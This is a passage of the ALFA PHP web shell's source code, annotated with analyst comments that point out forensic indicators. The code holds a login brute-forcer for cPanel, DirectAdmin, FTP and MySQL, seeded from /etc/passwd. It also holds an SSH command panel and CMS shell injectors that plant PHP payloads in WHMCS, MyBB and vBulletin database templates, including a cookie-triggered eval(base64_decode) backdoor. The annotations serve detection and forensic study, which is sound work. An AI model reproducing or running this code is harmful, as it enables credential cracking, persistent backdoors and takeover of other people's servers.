  2370. }
  2371. }else{
  2372. echo('<center>mysqli_connect : Error!</center>');
  2373. }
  2374. }
  2375. echo('</div>');
  2376. alfafooter();
  2377. }
  2378. function Alfa_DirectAdmin_Cracker($info){
        // Analyst note: submits one username/password pair from $info using HTTP
        // authentication. The URL is protocol+target+':'+port+'/CMD_LOGIN', or
        // protocol+target+'/phpmyadmin' when $info['mysql'] is truthy.
  2379. if(!$info['mysql'])
  2380. $url = $info['protocol'].$info['target'].':'.$info['port'].'/CMD_LOGIN';
  2381. else $url = $info['protocol'].$info['target'].'/phpmyadmin';
        // Certificate and host-name verification are both switched off, redirects are
        // followed, and every request carries the fixed Firefox/17.0 User-Agent set
        // below -- a stable string to search for in web and proxy logs.
  2382. $curl = curl_init();
  2383. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  2384. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  2385. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
  2386. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
  2387. curl_setopt($curl, CURLOPT_HEADER,0);
  2388. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2389. curl_setopt($curl, CURLOPT_URL,$url);
  2390. curl_setopt($curl, CURLOPT_USERPWD, $info['username'].':'.$info['password']);
  2391. if($info['mysql'])curl_setopt($curl, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
  2392. $result = curl_exec($curl);
  2393. $curl_errno = curl_errno($curl);
  2394. $curl_error = curl_error($curl);
        // A response body matching "CMD_FILE_MANAGER" or "frameset" is treated as a
        // successful login: the pair is printed in clear text and passed to
        // CrackerResualt(), which appends it to the result file.
  2395. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
  2396. elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
  2397. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
  2398. $info['target'] = $url;
  2399. CrackerResualt($info);
  2400. }
  2401. curl_close($curl);
  2402. }
  2403. function Alfa_CP_Cracker($info){
        // Analyst note: submits one username/password pair to protocol+target+':'+port
        // in a hand-built "Authorization: Basic" header. __ZW5jb2Rlcg() is defined
        // elsewhere in the file; presumably a base64 encoder -- confirm against its body.
        // TLS verification is disabled and the same fixed Firefox/17.0 User-Agent is
        // sent as in the other curl-based routines of this file.
  2404. $url = $info['protocol'].$info['target'].':'.$info['port'];
  2405. $curl = curl_init();
  2406. curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
  2407. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  2408. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
  2409. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
  2410. curl_setopt($curl, CURLOPT_HEADER,0);
  2411. curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
        // The header value ends with "\n\r" (not "\r\n"), an unusual byte sequence.
  2412. curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
  2413. curl_setopt($curl, CURLOPT_URL, $url);
  2414. $result = curl_exec($curl);
  2415. $curl_errno = curl_errno($curl);
  2416. $curl_error = curl_error($curl);
        // A response body containing "filemanager" (case-insensitive) counts as a
        // successful login; the pair is printed and logged through CrackerResualt().
  2417. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
  2418. elseif(preg_match('/filemanager/i',$result)){
  2419. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
  2420. $info['target'] = $url;
  2421. CrackerResualt($info);
  2422. }
  2423. curl_close($curl);
  2424. }
  2425. function Alfa_FTP_Cracker($info){
        // Analyst note: submits one username/password pair to protocol+target through
        // curl with CURLOPT_USERPWD. $info['port'] is not used in this routine.
  2426. $url = $info['protocol'].$info['target'];
  2427. $curl = curl_init();
  2428. curl_setopt($curl, CURLOPT_URL, $url);
  2429. curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
  2430. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  2431. curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
  2432. $result = curl_exec($curl);
  2433. $curl_errno = curl_errno($curl);
  2434. $curl_error = curl_error($curl);
        // Success is inferred from a digits:digits pattern in the response, presumably
        // the time column of a directory listing -- confirm against real output. On a
        // match the pair is printed and appended to the result file.
  2435. if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
  2436. elseif(preg_match('/(\d+):(\d+)/i',$result)){
  2437. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
  2438. $info['target'] = $url;
  2439. CrackerResualt($info);
  2440. }
  2441. curl_close($curl);
  2442. }
  2443. function Alfa_Mysql_Cracker($info){
        // Analyst note: tests one username/password pair by opening a mysqli connection
        // to target:port, with errors suppressed. On success the pair is appended to the
        // result file and printed; the connection handle is not kept or closed here.
  2444. if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
  2445. CrackerResualt($info);
  2446. echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green">  Login Success....</font><br>';
  2447. }
  2448. }
  2449. function Alfa_FTPC($info){
        // Analyst note: tests one username/password pair with ftp_connect()/ftp_login().
        // A successful login is only written to the result file; nothing is printed.
        // ftp_close() is called even when the connection failed, with errors suppressed.
  2450. if($con=@ftp_connect($info['target'],$info['port'])){
  2451. if($con){
  2452. $login=@ftp_login($con,$info['username'],$info['password']);
  2453. if($login){CrackerResualt($info);}}}
  2454. @ftp_close($con);
  2455. }
  2456. function CrackerResualt($info){
        // Analyst note: appends one line "target => username:password" to the file named
        // by $info['fcrack'] (opened in 'a+' mode, all errors suppressed). The brute-force
        // form in this file defaults that name to 'cracked.txt', so a plain-text file of
        // that name holding such lines is a forensic artifact of this routine.
  2457. $res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
  2458. $c = @fopen($info['fcrack'],'a+');
  2459. @fwrite($c, $res);
  2460. @fclose($c);
  2461. }
  2462. function Alfa_Call_Function_Cracker($method,$info){
        // Analyst note: dispatches on the posted login-panel value. 'cp' goes to
        // Alfa_CP_Cracker, 'direct' and 'phpmyadmin' to Alfa_DirectAdmin_Cracker, 'ftp'
        // to Alfa_FTP_Cracker and 'mysql' to Alfa_Mysql_Cracker. The final case repeats
        // the 'mysql' label, so it is never selected; any other value returns nothing.
  2463. switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
  2464. }
  2465. function alfaCrackers(){
        // Analyst note: renders the "Brute Forcer" form and, when alfa6 == 'start', tries
        // every posted username against every posted password through
        // Alfa_Call_Function_Cracker(). There is no delay or attempt limit in the loop,
        // so on the targeted service this is likely to appear as a dense run of failed
        // logins originating from the compromised web server's address.
  2466. alfahead();
  2467. AlfaNum(9,10);
  2468. echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
  2469. foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
  2470. echo '</select> Protocol: <select id="protocol" name="protocol">';
  2471. foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
        // On unix hosts the user-list textarea is pre-filled with the first field of
        // /etc/passwd, i.e. the local account names, each time the form is rendered.
        // The result-file field defaults to 'cracked.txt'.
  2472. echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
  2473. Port: <input id="port" type="text" name="port" value="2083">
  2474. <table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
  2475. <textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
  2476. &nbsp <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
  2477. Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
  2478. <p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
        // POST mapping: alfa1=target (scheme prefix stripped), alfa2=port, alfa3=user
        // list, alfa4=password list, alfa5=result file, alfa6=start flag,
        // alfa7=protocol, alfa8=login panel type.
  2479. $target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
  2480. $port = $_POST['alfa2'];
  2481. $usernames= $_POST['alfa3'];
  2482. $passwords = $_POST['alfa4'];
  2483. $fcrack = $_POST['alfa5'];
  2484. $cracking = $_POST['alfa6'];
  2485. $protocol = $_POST['alfa7'];
  2486. $loginpanel = $_POST['alfa8'];
        // $p ends up true only for the 'phpmyadmin' panel; it is passed on as 'mysql'.
  2487. $p = $loginpanel == 'phpmyadmin' ? $p = true : false;
  2488. if($cracking=='start'){
  2489. echo __pre();
        // Lists are split on "\n"; each entry is trimmed when the attempt is built.
  2490. $exuser = explode("\n",$usernames);
  2491. $expw = explode("\n",$passwords);
  2492. foreach($exuser as $user){
  2493. foreach($expw as $pw){
  2494. $array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
  2495. Alfa_Call_Function_Cracker($loginpanel,$array);
  2496. }
  2497. }
  2498. echo '<br><font color="red">Attack Finished...</font>';
  2499. }
  2500. echo '</div>';
  2501. alfafooter();
  2502. }
  2503. function alfassh2(){
        // Analyst note: SSH client panel built on PHP's ssh2 extension; when that
        // extension is missing only a "not supported" message is rendered.
        // POST mapping: alfa1=host, alfa2=login, alfa3=password, alfa4=port,
        // alfa5=command, alfa6='>>' to print the command output.
  2504. if(function_exists('ssh2_connect')){
        // The flag is reset on every call and re-established by a fresh password login,
        // so each request from this panel opens a new SSH session from the web server.
  2505. $_SESSION['connected']= false;
  2506. $ssh_ip = $_POST['alfa1'];
  2507. $ssh_login = $_POST['alfa2'];
  2508. $ssh_pass = $_POST['alfa3'];
  2509. $ssh_port = $_POST['alfa4'];
  2510. $ssh_command = $_POST['alfa5'];
  2511. if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port))
  2512. {
  2513. if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass))
  2514. {
  2515. $_SESSION['connected']= true;
  2516. }
  2517. }
        // Not authenticated: show the login form.
  2518. if($_SESSION['connected']!== true){
  2519. alfahead();
  2520. echo "<div class=header>";
  2521. echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;'><table cellpadding='2' cellspacing='0'><tr><td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=''></td><td><input type=text name=ssh_login value=''></td><td><input type=text name=ssh_pass value=''></td><td><input type=text name=ssh_port value=''></td><td><input type='submit' name='submit' value=' '></td></table></form></div>";
  2522. alfafooter();
  2523. }
        // Authenticated: the host, login, password and port are written back, unescaped,
        // into the onsubmit attribute of the returned form, so the SSH credentials are
        // present in the HTTP response body and re-sent with every command.
  2524. if($_SESSION['connected']==true){
  2525. alfahead();
  2526. echo "<div class=header>";
  2527. echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"".$ssh_ip."\",\"".$ssh_login."\",\"".$ssh_pass."\",\"".$ssh_port."\",this.ssh_command.value,\">>\"); return false;'><table cellpadding='2' cellspacing='0'><tr><td><input type=text name=ssh_command value=''></td><td><input type='submit' name='execute' value=' '></td></table></form><form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\'); return false;'><input type=submit name='destsession' value='logout'></form>";
        // ssh2_exec() runs with the posted command whether or not alfa6 is '>>'; the
        // flag only decides whether the output is read and printed (HTML-escaped).
  2528. $alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
  2529. stream_set_blocking($alfastream,true);
  2530. $output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO);
  2531. if($_POST['alfa6']=='>>'){
  2532. echo '<pre class=ml1>';
  2533. ob_start();
  2534. echo  stream_get_contents($output);
  2535. echo htmlspecialchars(ob_get_clean());
  2536. }
  2537. echo "</div>";
  2538. alfafooter();
  2539. }}else{
  2540. alfahead();
  2541. echo '<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>';
  2542. alfafooter();
  2543. }
  2544. }
  2545. function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";} // Analyst note: prints a "Click Here !" link to $string; the value is placed in the href attribute without escaping.
  2546. function alfaShellInjectors(){
        // Analyst note: "Cms Shell Injector" panel with three branches, selected by
        // alfa1=='whmcs', alfa2=='mybb' or alfa3=='vb'. Each branch takes database
        // credentials, writes code into a template row stored in the CMS database, and
        // then has the CMS render that template. ALFA_UPLOADER is a constant defined
        // elsewhere in this file. Every branch points the operator at a file named
        // solevisible.php under the CMS path, so that file name plus the template rows
        // named below are the places to inspect on a suspected host.
  2547. alfahead();
  2548. echo '<div class=header>';
  2549. AlfaNum(11);
  2550. echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
  2551. $selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
        // --- WHMCS branch ---------------------------------------------------------
  2552. if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
  2553. AlfaNum();
  2554. echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
  2555. $table = array('td1' =>
  2556.  array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
  2557.  'td2' =>
  2558.  array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
  2559.  'td3' =>
  2560.  array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
  2561.  'td4' =>
  2562.  array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
  2563.  'td5' =>
  2564.  array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
  2565. );
  2566. create_table($table);
  2567. echo $selector;
  2568. echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
        // POST mapping: alfa4=method, alfa6=db user, alfa7=db name, alfa8=db password,
        // alfa9=db host, alfa10=WHMCS URL.
  2569. if(isset($_POST['alfa6'])) {
  2570. $dbu = $_POST['alfa6'];
  2571. $dbn = $_POST['alfa7'];
  2572. $dbp = $_POST['alfa8'];
  2573. $dbh = $_POST['alfa9'];
  2574. $path = $_POST['alfa10'];
  2575. $method = $_POST['alfa4'];
  2576. $index = "{php}".ALFA_UPLOADER.";{/php}";
  2577. $newin = str_replace("'","\'",$index);
        // Replacement body for the password-reset e-mail template: the stock wording with
        // a {php} block after "Dear", plus a second {php} block that evaluates a
        // base64-encoded cookie ("sec2") when cookie "sec" holds a fixed value.
  2578. $newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
  2579. if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
  2580. if(filter_var($path,FILTER_VALIDATE_URL)){
  2581. $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
        // Database changes made here: the 'Password Reset Validation' row of
        // tblemailtemplates is read (to keep the original) and then overwritten, and a
        // row with e-mail 'solevisible@fbi.gov' is inserted into tblclients. Nothing in
        // this function removes that client row afterwards.
  2582. $soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
  2583. $soleGet = mysqli_fetch_assoc($soleSave);
  2584. $tempSave1 = $soleGet['message'];
  2585. $tempSave = str_replace("'","\'",$tempSave1);
  2586. $inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
  2587. $result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
  2588. $create = "insert into tblclients (email) values('solevisible@fbi.gov')";
  2589. $result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
        // 'auto' with curl available: a password reset for the inserted address is
        // requested through pwreset.php so the template is rendered, then the saved
        // template text is written back. In the other branch only instructions are
        // printed and the template row is left modified.
  2590. if(function_exists('curl_version') && $method == 'auto'){
  2591. $AlfaSole = new AlfaCURL(true);
  2592. $saveurl = $AlfaSole->Send($path."/pwreset.php");
  2593. $getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
  2594. $AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
  2595. $backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
  2596. $Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
  2597. __alert("shell injectet...");
  2598. $ff= 'http://'.$path."/solevisible.php";
  2599. output($ff);}else{
  2600. echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
        // --- MyBB branch ----------------------------------------------------------
  2601. }if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
  2602. AlfaNum(1,2,3,5);
  2603. echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
  2604. ";
  2605. $table = array('td1' =>
  2606.  array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
  2607.  'td2' =>
  2608.  array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
  2609.  'td3' =>
  2610.  array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
  2611.  'td4' =>
  2612.  array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
  2613.  'td5' =>
  2614.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
  2615. );
  2616. create_table($table);
  2617. echo $selector;
  2618. echo "<p><input type=submit value=' '></p></form></center></center>";
        // POST mapping: alfa4=method, alfa6=db user, alfa7=db name, alfa8=db password,
        // alfa9=db host, alfa10=table prefix (form default 'mybb_').
  2619. if(isset($_POST['alfa6'])) {
  2620. $dbu = $_POST['alfa6'];
  2621. $dbn = $_POST['alfa7'];
  2622. $dbp = $_POST['alfa8'];
  2623. $dbh = $_POST['alfa9'];
  2624. $prefix = $_POST['alfa10'];
  2625. $method = $_POST['alfa4'];
  2626. $shellCode = "{\${".ALFA_UPLOADER."}}";
  2627. $newinshell = str_replace("'","\'",$shellCode);
  2628. if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
  2629. $conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
        // Database change made here: the 'calendar' row of <prefix>templates gets the
        // "{${...}}" payload prepended. Any earlier copy of the payload is stripped from
        // the saved text first, so $repsave holds the template without it.
  2630. $inject = "select template from {$prefix}templates where  title= 'calendar'";
  2631. $result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
  2632. $GetTemp = mysqli_fetch_assoc($result);
  2633. $saveDate = $GetTemp['template'];
  2634. $repsave = str_replace($shellCode,"",$saveDate);
  2635. $repsave = str_replace("'","\'",$repsave);
  2636. $createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
  2637. $result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
        // The board URL is read from the 'bburl' setting to locate calendar.php.
  2638. $geturl = "select value from {$prefix}settings where name= 'bburl'";
  2639. $findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
  2640. $rowb = mysqli_fetch_assoc($findurl);
  2641. $furl = $rowb['value'];
  2642. $realurl = parse_url($furl,PHP_URL_HOST);
  2643. $realpath = parse_url($furl,PHP_URL_PATH);
  2644. $res = false;
  2645. $AlfaCurl = new AlfaCURL();
        // 'auto' over a raw socket: calendar.php is requested on port 80 and the template
        // is restored only when the first response line contains "200 OK". In the curl
        // fallback the page is requested but no restore query is issued, and in manual
        // mode nothing is restored either, so the modified row can persist.
  2646. if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
  2647. if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
  2648. @fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
  2649. @fputs($fsock, "HOST: $realurl\r\n");
  2650. @fputs($fsock, "Connection: close\r\n\r\n");
  2651. $check = fgets($fsock);
  2652. if(preg_match("/200 OK/i",$check)){
  2653. $repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
  2654. $clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
  2655. @fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
  2656. $AlfaCurl->Send($realurl.$realpath."/calendar.php");
  2657. $res = true;
  2658. }
  2659. if($res){
  2660. $ff = 'http://'.$realurl.$realpath."/solevisible.php";
  2661. output($ff);
  2662. }else{
  2663. $ff = 'http://'.$realurl.$realpath."/calendar.php";
  2664. $fff = 'http://'.$realurl.$realpath."/solevisible.php";
  2665. echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
  2666. }}}}
        // --- vBulletin branch -----------------------------------------------------
  2667. if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
  2668. AlfaNum(1,2,7,9,10);
  2669. echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
  2670. $table = array('td1' =>
  2671.  array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
  2672.  'td2' =>
  2673.  array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
  2674.  'td3' =>
  2675.  array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
  2676.  'td4' =>
  2677.  array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
  2678.  'td5' =>
  2679.  array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
  2680. );
  2681. create_table($table);
  2682. echo $selector;
  2683. echo '<p><input type="submit" value=" " /></p></form></center>';
        // POST mapping: alfa2=db host, alfa4=db user, alfa5=db password, alfa6=table
        // prefix, alfa7=db name, alfa8=method.
  2684. if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
  2685. $method = $_POST['alfa8'];
  2686. $code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
  2687. $conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_error($conn));
        // Database change made here: the 'faq' row of <prefix>template is replaced
        // entirely by the payload (the original text is kept in $savetoass), and the
        // board URL is read from the 'bburl' row of <prefix>setting.
  2688. $rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='faq'";
  2689. $recivedata = @mysqli_query($conn,$rec);
  2690. $getd = @mysqli_fetch_assoc($recivedata);
  2691. $savetoass = $getd['template'];
  2692. $code = str_replace("'","\'",$code);
  2693. $p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='faq'";
  2694. $ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
  2695. $geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
  2696. $getval = @mysqli_fetch_assoc($geturl);
  2697. $saveval = $getval['value'];
  2698. $realurl = parse_url($saveval,PHP_URL_HOST);
  2699. $realpath = parse_url($saveval,PHP_URL_PATH);
  2700. $res = false;
  2701. $AlfaCurl = new AlfaCURL();
        // 'auto': faq.php is requested (raw socket on port 80, or curl) and the saved
        // template is written back -- after a "200 OK" first line on the socket path,
        // unconditionally on the curl path. In manual mode the 'faq' row stays replaced.
  2702. if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
  2703. if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
  2704. @fputs($fsock, "GET $realpath/faq.php HTTP/1.1\r\n");
  2705. @fputs($fsock, "HOST: $realurl\r\n");
  2706. @fputs($fsock, "Connection: close\r\n\r\n");
  2707. $check = fgets($fsock);
  2708. if(preg_match("/200 OK/i",$check)){
  2709. $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
  2710. $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
  2711. $res = true;
  2712. }
  2713. @fclose($fsock);
  2714. }
  2715. }elseif(function_exists('curl_version') && $method == 'auto'){
  2716. $AlfaCurl->Send($realurl.$realpath."/faq.php");
  2717. $p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
  2718. $ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
  2719. $res = true;
  2720. }
  2721. if($res){
  2722. $ff = 'http://'.$realurl.$realpath."/solevisible.php";
  2723. output($ff);
  2724. }else{
  2725. $ff = 'http://'.$realurl.$realpath."/faq.php";
  2726. $fff = 'http://'.$realurl.$realpath."/solevisible.php";
  2727. echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
  2728. echo '</div>';
  2729. alfafooter();
  2730. }
  2731. function alfaupdatepath(){
            // Analyst note: stores a non-empty posted 'path' in the session under the
